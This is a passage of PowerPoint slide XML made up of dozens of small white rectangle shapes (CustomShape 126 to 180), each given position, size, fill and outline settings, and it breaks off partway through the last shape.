        <p:spPr>
          <a:xfrm>
            <a:off x="8920080" y="4622760"/>
            <a:ext cx="50400" cy="77400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="CustomShape 126"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8977320" y="4668840"/>
            <a:ext cx="28080" cy="4320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="CustomShape 127"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9012240" y="4622760"/>
            <a:ext cx="50400" cy="75960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="CustomShape 128"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9070920" y="4624560"/>
            <a:ext cx="66240" cy="74160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="CustomShape 129"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9301320" y="4695840"/>
            <a:ext cx="91800" cy="96480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="CustomShape 130"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9306000" y="4703760"/>
            <a:ext cx="82080" cy="82080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="CustomShape 131"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9312120" y="4710240"/>
            <a:ext cx="69480" cy="69480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176" name="CustomShape 132"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9301320" y="4695840"/>
            <a:ext cx="48960" cy="96480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="CustomShape 133"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9412200" y="4703760"/>
            <a:ext cx="82080" cy="82080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="CustomShape 134"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9437760" y="4729320"/>
            <a:ext cx="34560" cy="31320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="CustomShape 135"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9513720" y="4695840"/>
            <a:ext cx="91800" cy="96480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="CustomShape 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9540720" y="4724280"/>
            <a:ext cx="39240" cy="41040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="CustomShape 137"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9531360" y="4716360"/>
            <a:ext cx="55080" cy="55080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="CustomShape 138"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9524880" y="4710240"/>
            <a:ext cx="69480" cy="69480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="CustomShape 139"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9632880" y="4711680"/>
            <a:ext cx="64800" cy="64800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="CustomShape 140"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9645480" y="4721400"/>
            <a:ext cx="42480" cy="45720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="CustomShape 141"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9631440" y="4710240"/>
            <a:ext cx="69480" cy="69480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="CustomShape 142"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9306000" y="4819680"/>
            <a:ext cx="82080" cy="80640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="CustomShape 143"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9328320" y="4840200"/>
            <a:ext cx="39240" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="CustomShape 144"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9412200" y="4819680"/>
            <a:ext cx="82080" cy="80640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="CustomShape 145"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9418680" y="4826160"/>
            <a:ext cx="69480" cy="66240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="CustomShape 146"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9404280" y="4857840"/>
            <a:ext cx="97920" cy="48960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="CustomShape 147"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9518760" y="4819680"/>
            <a:ext cx="82080" cy="80640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="CustomShape 148"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9524880" y="4826160"/>
            <a:ext cx="69480" cy="66240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="CustomShape 149"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9620280" y="4809960"/>
            <a:ext cx="93240" cy="97920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="CustomShape 150"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9624960" y="4819680"/>
            <a:ext cx="82080" cy="80640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="CustomShape 151"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9631440" y="4826160"/>
            <a:ext cx="69480" cy="66240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="CustomShape 152"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9620280" y="4811760"/>
            <a:ext cx="47160" cy="95040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="CustomShape 153"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9453600" y="4699080"/>
            <a:ext cx="45720" cy="45720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="CustomShape 154"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9539280" y="4840200"/>
            <a:ext cx="41040" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="CustomShape 155"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9536040" y="4835520"/>
            <a:ext cx="48960" cy="47160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="CustomShape 156"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9347040" y="4807080"/>
            <a:ext cx="39240" cy="90000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="CustomShape 157"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9301320" y="4627440"/>
            <a:ext cx="20160" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202" name="CustomShape 158"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9331200" y="4627440"/>
            <a:ext cx="21960" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="CustomShape 159"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9361440" y="4627440"/>
            <a:ext cx="20160" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="CustomShape 160"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9387000" y="4627440"/>
            <a:ext cx="36000" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="CustomShape 161"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9429840" y="4627440"/>
            <a:ext cx="2880" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206" name="CustomShape 162"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9442440" y="4627440"/>
            <a:ext cx="17280" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="207" name="CustomShape 163"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9468000" y="4627440"/>
            <a:ext cx="1080" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="CustomShape 164"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9477360" y="4627440"/>
            <a:ext cx="36000" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="CustomShape 165"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9534600" y="4627440"/>
            <a:ext cx="18720" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="CustomShape 166"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9556920" y="4627440"/>
            <a:ext cx="34560" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="CustomShape 167"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9596520" y="4627440"/>
            <a:ext cx="34560" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="CustomShape 168"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9636120" y="4627440"/>
            <a:ext cx="20160" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="CustomShape 169"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9656640" y="4627440"/>
            <a:ext cx="23400" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="CustomShape 170"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9686880" y="4635360"/>
            <a:ext cx="6120" cy="29880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="CustomShape 171"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9717120" y="4627440"/>
            <a:ext cx="26640" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="CustomShape 172"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9752040" y="4627440"/>
            <a:ext cx="37800" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="CustomShape 173"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9798120" y="4627440"/>
            <a:ext cx="29880" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218" name="CustomShape 174"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9836280" y="4627440"/>
            <a:ext cx="21960" cy="36000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219" name="CustomShape 175"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9302760" y="4559400"/>
            <a:ext cx="28080" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="CustomShape 176"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9336240" y="4559400"/>
            <a:ext cx="26640" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="CustomShape 177"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9366120" y="4557600"/>
            <a:ext cx="21960" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="222" name="CustomShape 178"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9391680" y="4559400"/>
            <a:ext cx="20160" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="CustomShape 179"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9416880" y="4557600"/>
            <a:ext cx="37800" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="CustomShape 180"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9462960" y="4559400"/>
